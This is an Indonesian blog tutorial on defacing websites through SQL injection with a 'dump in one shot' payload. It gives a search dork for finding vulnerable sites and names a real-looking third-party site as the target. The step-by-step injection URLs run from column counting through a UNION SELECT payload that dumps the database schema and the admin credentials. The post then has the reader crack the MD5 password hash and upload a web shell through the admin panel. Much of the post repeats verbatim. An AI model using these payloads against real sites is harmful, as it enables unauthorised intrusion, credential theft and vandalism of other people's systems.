Tutorial Deface SQL injection with DIOS (Dump In One Shot) di Android
Sunday, August 5, 2018
Add Comment
Tutorial Deface SQL injection with DIOS (Dump In One Shot) di Android - Holla, pada kesempatan kali ini saya akan menunjukkan tutorial/cara deface web dengan metode Sql injection with DIOS di android. Sebenarnya metode ini sama saja dengan sql injection pada biasanya, hanya saja nanti kita akan langsung dump semua database nya.
dork : inurl:/.php?id= site:com (kembangkan sendiri cuk :v)
siapkan bahan2 nya terlebih dahulu yaitu :
1. Shell > Download shell disini
2. Script deface > Belajar membuat Script Deface
3. target
disini saya sudah mempunyai target http://oxbuiltinfratech.com/builder-detail.php?bid=10
langsung saja ke tutorialnya.
1. Coba buka target anda dan kasih tanda petik/(') di belakang angka jadi seperti ini http://oxbuiltinfratech.com/builder-detail.php?bid=10' jika vuln akan muncul tulisan error/sebagian konten ada yang hilang.
2. coba kita order by web nya dengan menambahkan query +order+by+1--+ untuk mencari berapa banyak jumlah kolom nya, seperti ini, http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+1--+ -> No error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+2--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+3--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+4--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+5--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+6--+ -> Error
ternyata jumlah column nya ada 5 gaes, lanjut ke step berikutnya.
3. Step kali ini kita mencari angka togel (istilahnya) untuk dump database nya dengan mengganti query +order+by menjadi +union+select+ dan menambahkan tanda (-) didepan angka. Karna banyak column nya ada 5 jadi saya menambahkan query nya seperti ini http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,4,5--+ dan akan muncul angka togel nya
4. Jika sudah muncul angka togel nya, kita dump pada angka yang keluar, disini ada angka 2 dan 4, untuk query dios nya bisa pake dios dari M@dbl0od ini (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
saya akan dump pada angka 4 saja jadi seperti ini http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2)),5--+
5. Jika sudah menemukan table admin nya, perhatikan pada query (information_schema.columns), hapus query tersebut menjadi table admin nya, disitu keluar table nya (tbl_admin), dan perhatikan pada query table_name, hapus query tersebut menjadi username/email admin nya, disitu keluar emailid, jadi ganti table_name menjadi emailid, dan perhatikan juga pada query column_name, hapus query column_name menjadi passwordnya, ABAIKAN ANGKA 0 DIDEPAN DAN DIBELAKANG, disitu yang keluar password jadi saya mengganti column_name menjadi password lebih jelasnya seperti ini :
http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,(Select+export_set(5,@:=0,(select+count(*)from(tbl_admin)where@:=export_set(5,export_set(5,@,emailid,0x3c6c693e,2),password,0x203a3a20,2)),@,2)),5--+
6. Setelah keluar Username dan Password nya, sekarang login ke Admin Panel nya dan upload shell, disini password saya berbentuk md5 dan harus di decrypt dulu menjadi text, anda bisa decrypt password md5 di https://hashkiller.co.uk/md5-decrypter.aspx
Dan doorrr, saya sudah masuk ke dashboard admin, tinggal cari page untuk upload shell nya deh.
Sekian dari Turorial Deface SQL Injection with DIOS (Dump In One Shot) di Android ini, ini hanya untuk pengetahuan saja dan jika terjadi apa2 itu semua diluar tanggung jawab kami.
2. coba kita order by web nya dengan menambahkan query +order+by+1--+ untuk mencari berapa banyak jumlah kolom nya, seperti ini, http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+1--+ -> No error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+3--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+4--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+5--+ -> Masih gak error
http://oxbuiltinfratech.com/builder-detail.php?bid=10'+order+by+6--+ -> Error
ternyata jumlah column nya ada 5 gaes, lanjut ke step berikutnya.
3. Step kali ini kita mencari angka togel (istilahnya) untuk dump database nya dengan mengganti query +order+by menjadi +union+select+ dan menambahkan tanda (-) didepan angka. Karna banyak column nya ada 5 jadi saya menambahkan query nya seperti ini http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,4,5--+ dan akan muncul angka togel nya
4. Jika sudah muncul angka togel nya, kita dump pada angka yang keluar, disini ada angka 2 dan 4, untuk query dios nya bisa pake dios dari M@dbl0od ini (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
saya akan dump pada angka 4 saja jadi seperti ini http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2)),5--+
5. Jika sudah menemukan table admin nya, perhatikan pada query (information_schema.columns), hapus query tersebut menjadi table admin nya, disitu keluar table nya (tbl_admin), dan perhatikan pada query table_name, hapus query tersebut menjadi username/email admin nya, disitu keluar emailid, jadi ganti table_name menjadi emailid, dan perhatikan juga pada query column_name, hapus query column_name menjadi passwordnya, ABAIKAN ANGKA 0 DIDEPAN DAN DIBELAKANG, disitu yang keluar password jadi saya mengganti column_name menjadi password lebih jelasnya seperti ini :
http://oxbuiltinfratech.com/builder-detail.php?bid=-10'+union+select+1,2,3,(Select+export_set(5,@:=0,(select+count(*)from(tbl_admin)where@:=export_set(5,export_set(5,@,emailid,0x3c6c693e,2),password,0x203a3a20,2)),@,2)),5--+
6. Setelah keluar Username dan Password nya, sekarang login ke Admin Panel nya dan upload shell, disini password saya berbentuk md5 dan harus di decrypt dulu menjadi text, anda bisa decrypt password md5 di https://hashkiller.co.uk/md5-decrypter.aspx
Dan doorrr, saya sudah masuk ke dashboard admin, tinggal cari page untuk upload shell nya deh.
Sekian dari Turorial Deface SQL Injection with DIOS (Dump In One Shot) di Android ini, ini hanya untuk pengetahuan saja dan jika terjadi apa2 itu semua diluar tanggung jawab kami.
0 Response to "Tutorial Deface SQL injection with DIOS (Dump In One Shot) di Android"
Post a Comment
Berkomentarlah dengan bijak & sopan :)